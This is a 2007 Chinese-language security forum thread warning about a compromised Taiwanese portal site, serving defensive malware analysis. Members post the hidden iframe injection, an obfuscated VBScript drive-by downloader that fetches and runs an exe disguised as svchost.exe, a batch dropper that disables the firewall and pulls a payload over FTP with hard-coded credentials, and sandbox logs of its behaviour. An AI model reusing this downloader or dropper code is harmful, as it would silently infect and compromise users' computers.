【警告】哈尼綜合生活網-美食購物論壇生活資訊小型入口網站 發現惡意網頁與木馬程式

第 1 頁,共 2 頁 1 2 末頁末頁
顯示結果從第 1 筆 到 10 筆,共計 11 筆
  1. #1
    地平線的那端 DarkSkyline 的大頭照
    註冊日期
    2001-05-09
    所在地區
    Hinet 4M/1M
    討論區文章
    554

    【警告】哈尼綜合生活網-美食購物論壇生活資訊小型入口網站 發現惡意網頁與木馬程式

    FYI:
    hxxp://www.honeypaper.com.tw/html/index.html

    "AntiVir PersonalEdition Classic" 發現 [HEUR/Exploit.HTML]惡意網頁與[TR/Lineage.73216.2]木馬程式

    PS:請各位網友小心,沒事請勿連結到此網站,以免中獎~



  2. #2
    會員
    註冊日期
    2007-03-22
    所在地區
    CABLE
    討論區文章
    94

    回覆: 【警告】哈尼綜合生活網-美食購物論壇生活資訊小型入口網站 發現惡意網頁與木馬程式

    網頁code
    Url = "http://www.honeypaper.com.tw";
    </script><iframe src="http://www.avvcc.com/index.htm" width="100" height="0" frameborder="0"></iframe>
    <script src="http://www.honeypaper.com.tw/include/js/ajax.js" type="text/javascript" language="javascript"></script>
    <script src="http://www.honeypaper.com.tw/include/js/common.js" type="text/javascript" language="javascript"></script>
    <base target="_blank" />
    上面紅色的連結!
    <iframe src=6143.htm width=0 height=0 frameborder=0></iframe>
    <iframe src="fymianshaani.htm" width="100" height="0" frameborder="0"></iframe>
    <iframe src="vip.htm" width="100" height="0" frameborder="0"></iframe>
    等會兒再測

  3. #3
    會員
    註冊日期
    2007-03-22
    所在地區
    CABLE
    討論區文章
    94

    回覆: 【警告】哈尼綜合生活網-美食購物論壇生活資訊小型入口網站 發現惡意網頁與木馬程式

    hxxp://www.avvcc.com/6143.htm
    <html>
    <script language="VBScript">
    on error resume next
    maface="Mic"&"ro"&"so"&"ft.X"&"M"&"LHT"&"TP"
    tttatat="S"&"cr"&"ip"&"tin"&"g."&"Fi"&"le"&"Sy"&"st"&"em"&"Ob"&"j"&"e"&"ct"
    kav="o"&"bje"&"ct"
    ufoad123="A"&"do"&"db"&".St"&"rea"&"m"
    Set df = document.createElement(kav)
    regedit="c"&"ls"&"id:BD"&"9"&"6C5"&"56-6"&"5A3"&"-1"&"1D"&"0-"&"98"&"3"&"A-0"&"0"&"C04F"&"C2"&"9E36"
    diter="c"&"l"&"a"&"s"&"s"&"i"&"d"
    df.setAttribute diter, regedit
    Set x = df.CreateObject(maface,"")
    set SS = df.createobject(ufoad123,"")
    SS.type = 1
    x.Open "GET", "http://www.avvcc.com/20070418a.exe ", False
    x.Send
    marco1="svchost.exe"
    set F = df.createobject(tttatat,"")
    tmp2=2
    set tmp = F.GetSpecialFolder(tmp2)
    SS.open
    marco1= F.BuildPath(tmp,marco1)
    SS.write x.responseBody
    SS.savetofile marco1,2
    SS.close
    qwe324a="S"&"he"&"l"&"l."&"Appl"&"i"&"ca"&"ti"&"on"
    set Q = df.createobject(qwe324a,"")
    asdwr="op"&"e"&"n"
    Q.ShellExecute marco1,"","",asdwr,0
    </script>
    </html>

  4. #4
    會員
    註冊日期
    2007-03-22
    所在地區
    CABLE
    討論區文章
    94

    回覆: 【警告】哈尼綜合生活網-美食購物論壇生活資訊小型入口網站 發現惡意網頁與木馬程式

    我只抓到這隻
    附加檔案 附加檔案

  5. #5
    會員
    註冊日期
    2007-03-22
    所在地區
    CABLE
    討論區文章
    94

    回覆: 【警告】哈尼綜合生活網-美食購物論壇生活資訊小型入口網站 發現惡意網頁與木馬程式

    tt.bat的結構
    net stop sharedaccess
    echo open 222.191.251.99>>1.txt
    echo czh808>>1.txt
    echo haha123520>>1.txt
    echo get 0627xh.exe>>1.txt
    echo bye>>1.txt
    ftp -s:1.txt&del 1.txt
    set dAte=%dAte%
    dAte 1980-01-01
    @echo off & setlocAl enAbleextensions
    echo WScript.Sleep 110 > %system%.\run$.vbs
    set /A i = 10
    :Timeout
    if %i% == 0 goto Next
    setlocAl
    set /A i = %i% - 1
    cscript //nologo %system%.\ run$.vbs
    goto Timeout
    goto End
    :Next
    @0627xh.exe /uninstAll /silence
    del 0627xh.exe
    del tt.bat
    del soft.vbs


    此文章於 2007-07-03 08:37 AM 被 Roger 編輯。

  6. #6
    會員
    註冊日期
    2007-03-22
    所在地區
    CABLE
    討論區文章
    94

    回覆: 【警告】哈尼綜合生活網-美食購物論壇生活資訊小型入口網站 發現惡意網頁與木馬程式

    soft.vbs的結構
    Set ws = CreateObject("Wscript.Shell")
    ws.run "cmd /c tt.bat",vbhide

  7. #7
    會員
    註冊日期
    2007-03-22
    所在地區
    CABLE
    討論區文章
    94

    回覆: 【警告】哈尼綜合生活網-美食購物論壇生活資訊小型入口網站 發現惡意網頁與木馬程式

    再下去,我就不會解了

    那個0627xh.exe,到底載點在哪裡呢

  8. #8
    會員
    註冊日期
    2007-03-22
    所在地區
    CABLE
    討論區文章
    94

    回覆: 【警告】哈尼綜合生活網-美食購物論壇生活資訊小型入口網站 發現惡意網頁與木馬程式

    有人解出來了!
    ftp://222.191.251.99/0627xh.exe
    username:czh808
    password:haha123520

    ftp://222.191.251.99/gztest.exe
    username:czh808
    password:haha123520
    附加檔案 附加檔案

  9. #9
    會員
    註冊日期
    2007-03-22
    所在地區
    CABLE
    討論區文章
    94

    回覆: 【警告】哈尼綜合生活網-美食購物論壇生活資訊小型入口網站 發現惡意網頁與木馬程式

    運行0627xh.exe,發現下列行為,被EQ-Secure RC3攔截!

    2007-07-03 09:26:12 運行應用程序 操作:允許
    進程路徑:C:\windows\Explorer.EXE
    文件路徑:D:\桌面\virus\0627xh\0627xh.exe
    規則:應用程序規則->系統程序->%windir%\Explorer.EXE

    2007-07-03 09:27:24 創建文件 操作:允許
    進程路徑:D:\桌面\virus\0627xh\0627xh.exe
    文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web\printers\images
    規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


    2007-07-03 09:27:24 創建文件 操作:允許
    進程路徑:D:\桌面\virus\0627xh\0627xh.exe
    文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web\printers
    規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


    2007-07-03 09:27:24 創建文件 操作:允許
    進程路徑:D:\桌面\virus\0627xh\0627xh.exe
    文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web
    規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


    2007-07-03 09:27:24 創建文件 操作:允許
    進程路徑:D:\桌面\virus\0627xh\0627xh.exe
    文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web\printers
    規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


    2007-07-03 09:27:24 創建文件 操作:允許
    進程路徑:D:\桌面\virus\0627xh\0627xh.exe
    文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web\printers\images
    規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


    2007-07-03 09:27:24 創建文件 操作:允許
    進程路徑:D:\桌面\virus\0627xh\0627xh.exe
    文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web\printers\images\drcerwq.exe
    規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


    2007-07-03 09:27:24 創建文件 操作:允許
    進程路徑:D:\桌面\virus\0627xh\0627xh.exe
    文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web\printers\images\drcerwq.dll
    規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


    2007-07-03 09:27:24 創建注冊表值 操作:阻止
    進程路徑:D:\桌面\virus\0627xh\0627xh.exe
    注冊表路徑:HKEY_CURRENT_USER\machine\software\microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
    注冊表名稱:{7B8B0E17-B03E-4EDE-BA46-F31692D977BB}
    規則:所有程序規則->資源管理器->*\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks*


    2007-07-03 09:27:24 創建注冊表值 操作:阻止
    進程路徑:D:\桌面\virus\0627xh\0627xh.exe
    注冊表路徑:HKEY_CURRENT_USER\machine\software\microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
    注冊表名稱:{7B8B0E17-B03E-4EDE-BA46-F31692D977BB}
    規則:所有程序規則->資源管理器->*\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks*
    1.他會在C:\windows\Web\printers\images\生成
    drcerwq.exe
    drcerwq.dll
    2.他會創建注冊表值
    HKEY_CURRENT_USER\machine\software\microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
    {7B8B0E17-B03E-4EDE-BA46-F31692D977BB}

  10. #10
    會員
    註冊日期
    2007-03-22
    所在地區
    CABLE
    討論區文章
    94

    回覆: 【警告】哈尼綜合生活網-美食購物論壇生活資訊小型入口網站 發現惡意網頁與木馬程式

    運行drcerwq.exe,發現下列行為,被EQ-Secure RC3攔截!

    2007-07-03 09:45:05 創建文件 操作:允許
    進程路徑:D:\桌面\virus\0627xh\生成物\drive\C\windows\Web\printers\images\drcerwq.exe
    文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web\printers\images
    規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


    2007-07-03 09:45:05 創建文件 操作:允許
    進程路徑:D:\桌面\virus\0627xh\生成物\drive\C\windows\Web\printers\images\drcerwq.exe
    文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web\printers
    規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


    2007-07-03 09:45:05 創建文件 操作:允許
    進程路徑:D:\桌面\virus\0627xh\生成物\drive\C\windows\Web\printers\images\drcerwq.exe
    文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web
    規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


    2007-07-03 09:45:05 創建文件 操作:允許
    進程路徑:D:\桌面\virus\0627xh\生成物\drive\C\windows\Web\printers\images\drcerwq.exe
    文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web\printers
    規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


    2007-07-03 09:45:05 創建文件 操作:允許
    進程路徑:D:\桌面\virus\0627xh\生成物\drive\C\windows\Web\printers\images\drcerwq.exe
    文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web\printers\images
    規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


    2007-07-03 09:45:05 創建文件 操作:允許
    進程路徑:D:\桌面\virus\0627xh\生成物\drive\C\windows\Web\printers\images\drcerwq.exe
    文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web\printers\images\drcerwq.exe
    規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


    2007-07-03 09:45:05 創建文件 操作:允許
    進程路徑:D:\桌面\virus\0627xh\生成物\drive\C\windows\Web\printers\images\drcerwq.exe
    文件路徑:C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\drive\C\windows\Web\printers\images\drcerwq.dll
    規則:所有程序規則->保護安全軟體->C:\Documents and Settings\Hung Jui Hung\Application Data\Sandbox\DefaultBox\*


    2007-07-03 09:45:06 創建注冊表值 操作:阻止
    進程路徑:D:\桌面\virus\0627xh\生成物\drive\C\windows\Web\printers\images\drcerwq.exe
    注冊表路徑:HKEY_CURRENT_USER\machine\software\microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
    注冊表名稱:{7B8B0E17-B03E-4EDE-BA46-F31692D977BB}
    規則:所有程序規則->資源管理器->*\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks*


    2007-07-03 09:45:06 創建注冊表值 操作:阻止
    進程路徑:D:\桌面\virus\0627xh\生成物\drive\C\windows\Web\printers\images\drcerwq.exe
    注冊表路徑:HKEY_CURRENT_USER\machine\software\microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
    注冊表名稱:{7B8B0E17-B03E-4EDE-BA46-F31692D977BB}
    規則:所有程序規則->資源管理器->*\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks*
    1.他會在C:\windows\Web\printers\images\生成
    drcerwq.exe
    drcerwq.dll
    2.他會創建注冊表值
    HKEY_CURRENT_USER\machine\software\microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
    {7B8B0E17-B03E-4EDE-BA46-F31692D977BB}



類似的主題

  1. 【警告】taiwan-bbs 網站發現木馬程式
    作者:DarkSkyline 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 3
    最後發表: 2007-12-17, 07:43 AM
  2. 【警告】ENews 電子新聞報發現惡意網頁
    作者:DarkSkyline 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 5
    最後發表: 2007-07-22, 03:37 PM
  3. 【警告】YY軟件園網站發現木馬程式
    作者:DarkSkyline 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 10
    最後發表: 2006-12-20, 12:58 PM
  4. [注意]搜索網站發現惡意程式
    作者:DarkSkyline 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 10
    最後發表: 2006-11-17, 11:25 PM
  5. 【警告】視頻VIDEO健康全接觸網站發現惡意程式
    作者:DarkSkyline 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 0
    最後發表: 2006-11-12, 10:37 PM

 

此網頁沒有從搜尋引擎而來的訪客

發表文章規則

  • 不可以發表新主題
  • 不可以回覆文章
  • 不可以上傳附加檔案
  • 不可以編輯自己的文章
  •